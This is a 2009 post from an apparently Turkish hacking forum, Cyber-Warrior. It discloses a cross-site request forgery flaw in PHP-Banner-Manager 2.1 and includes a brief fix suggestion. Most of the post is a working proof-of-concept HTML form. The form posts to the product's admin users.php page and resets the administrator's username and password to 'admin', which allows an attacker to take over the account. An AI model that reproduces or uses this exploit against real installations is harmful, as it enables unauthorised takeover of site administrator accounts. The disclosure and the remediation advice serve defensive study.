ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> PHP-Banner-Manager/ver2.1 ~ XSRF Vuln.
PHP-Banner-Manager/ver2.1 ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers/Kadir DOGAN
Date :
12.07.2009 20:58:47
#
PHP-Banner-Manager/ver2.1 ~ XSRF Vuln.
[Full Screen Display]
<------------------- header data start ------------------- > ############################################################# # author * : UzmiX ~ Kadir DOGAN # Script Name : PHP-Banner-Manager ver2.1 - price US $149 # Download : http://www.scriptdemo.com/buy/phpbm21/ ( $ 149 ) # Bug Type : XSRF # Infection : Admin Sifresi Deistirilebilir. # Demo Script : http://www.scriptdemo.com/php-banner-manager/ver2.1/ # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form method=post action=http://www.scriptdemo.com/php-banner-manager/ver2.1/admin/users.php?display_nr=10&search=admin&order_by=user_id&order_type=asc&from=&search=admin&user_id=1&edit=edit_delete name=form1 onSubmit=return formCheck(this) enctype=multipart/form-data> Email (username): <INPUT type=text name=username size=30 value=admin class=input> password: <INPUT type=text name=password size=30 value=admin class=input> Name: <INPUT type=text name=name size=30 value=admin class=input> <br><input type=submit name=submit value=update class=button> < -- bug code end of -- >
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©